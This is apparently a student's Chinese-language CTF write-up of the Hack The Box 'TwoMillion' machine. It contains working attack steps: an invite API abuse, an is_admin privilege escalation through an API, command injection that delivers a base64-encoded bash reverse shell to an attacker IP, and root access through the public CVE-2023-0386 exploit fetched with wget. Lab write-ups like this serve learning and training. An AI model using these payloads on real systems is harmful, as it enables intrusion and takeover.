TwoMillion

Test1

先namp扫描一下，发现有两个TCP端口22和80开放

这里80端口无法追踪到重定向，这里就需要用到DNS域名解析，在kali的/etc/hosts文件中添加ip和对应的网址

10.129.229.66 2million.htb

这样之后再重新去访问就可以访问到了

Task2

找到有一个join界面，查看源码，搜索js，又看到题目提示是invite就找到了

inviteapi.min.js

Task3

点击进入inviteapi.min.js

可以利用工具进行反混淆 de4js |JavaScript 反混淆器和解包器，点这个自动解码就可以看到两个函数

function verifyInviteCode(code) {
    var formData = {
        "code": code
    };
    $.ajax({
        type: "POST",
        dataType: "json",
        data: formData,
        url: '/api/v1/invite/verify',
        success: function (response) {
            console.log(response)
        },
        error: function (response) {
            console.log(response)
        }
    })
}

function makeInviteCode() {
    $.ajax({
        type: "POST",
        dataType: "json",
        url: '/api/v1/invite/how/to/generate',
        success: function (response) {
            console.log(response)
        },
        error: function (response) {
            console.log(response)
        }
    })
}

Test4

通过上面得到的两个函数，发现其中有一个好像可以得到邀请码，curl一下看看，得到了邀请码的base64编码

curl -X POST http://2million.htb/api/v1/invite/generate

curl -X [传参方式] [url]用于指定传参方法的参数

解码结果

RVNSW-QN126-WE3BU-NYOHH

Test5

这里进行目录扫描，发现有注册和登录界面

先去注册一下，并且需要刚刚解码的邀请码，但是这里好像不能直接复制上去，输入也不行，就进行抓包吧

注册之后就可以登录了

登录进去后在这个access下找到了Connection Pack，点击后会下载一个文件，直接右击复制一下下载路径

http://2million.htb/api/v1/user/vpn/generate

Test6

因为上面的路径是api/v1,查看是否存在其他接口

在admin下的api有三个

Test7

在bp访问api/v1/admin/settings/update，需要修改请求方法，根据报错补全信息，这里要注意的是Cookie值需要在页面中的Network中拿到

发现有json响应可以修改权限

这里发现依旧报错提示，没有is_admin参数，所以添加这个参数，然后又报错了没有这个email，所以就把email换成注册的那个email

ok有正常回显了，可以验证一下，访问/api/v1/admin/auth，发现回显的是true，提权成功

emmm就是一开始我打的是引导模式，有很多小问题，有点嫌慢就改成闯关模式了（就是只要拿到flag的那种，所以后面的Test就没做，想做的可以参考一下网上的博客https://buutt3rf1y.github.io/2025/03/19/HTB-TwoMillion/

UserFlag

然后再看/api/v1/admin/vpn/generate路径，依旧修改传参方式

这里修改了Content/Type为json格式，然后传一个username上去，发现返回了很多东西

并且发现不管传什么都会有回显

利用管道分隔符执行命令进行rce，发现成功了

{"username":"222;whoami  #"}

{"username":"222;ls  #"}

这里尝试了很多rce的命令，各种读文件，发现没有回显，看了学长的博客发现直接反弹shell了

bash -i >& /dev/tcp/[kali分配到的ip]/2333 0>&1

对其进行base64编码

{"username":"1;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNy4xMTYvMjMzMyAwPiYx | base64 -d| /bin/bash;"}

ok拿到shell了

利用find命令找user.txt

尝试读取，但是要admin权限才能读到

查看网址根目录，发现有env文件

在里面看到了admin的密码

提权

su admin

ok拿到第一个flag

RootFlag

接下来就是继续提权为root，可以继续查找和admin相关的文件

find / -user admin -type f 2>/dev/null | grep -Ev "^/proc|^/run|^/sys"

看到有一个mail目录下的文件，感觉有用，可以看一下

From: ch4p <ch4p@2million.htb>
To: admin <admin@2million.htb>
Cc: g0blin <g0blin@2million.htb>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <9876543210@2million.htb>
X-Mailer: ThunderMail Pro 5.2

Hey admin,

I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.

HTB Godfather

是一份类似于邮件的，说了一堆英文，其中可以注意到有提到CVE，OverlayFS / FUSE，可以找到提升权限的漏洞

EXP：https://github.com/xkaneiki/CVE-2023-0386

下载后复制到kali

在kali上起一个服务

php -S 0:80

再在服务器上下载exp

wget http://10.10.17.116/CVE-2023-0386-main.zip

这里显示权限不足，那就尝试放到/tmp目录下

然后解压并进入目录，然后参考github的教程做

unzip CVE-2023-0386-main.zip
cd /tmp/CVE-2023-0386-main

make all
./fuse ./ovlcap/lower ./gc

在另一个终端输入

./exp

现在是root身份，然后就可以读取/root/root.txt

拿到了rootflag

小结

这也算是打的第三个靶机了，感觉渗透的话，首先要做的肯定就是nmap扫一下，看看哪些端口开着，也可以扫一下看看是否存在其他主机，或者用fscan扫描，之后好像就没有什么固定的做法了，就是一些基本的信息收集（比如扫目录，看源码之类的）和提权，基础的话就是要熟悉那些基本的扫描工具还有提权工具吧，还有就是要会一些基本的命令（比如php -S，wget，chmod这些）还有反弹shell，感觉学的还不是很深，所以只能先浅显的总结一下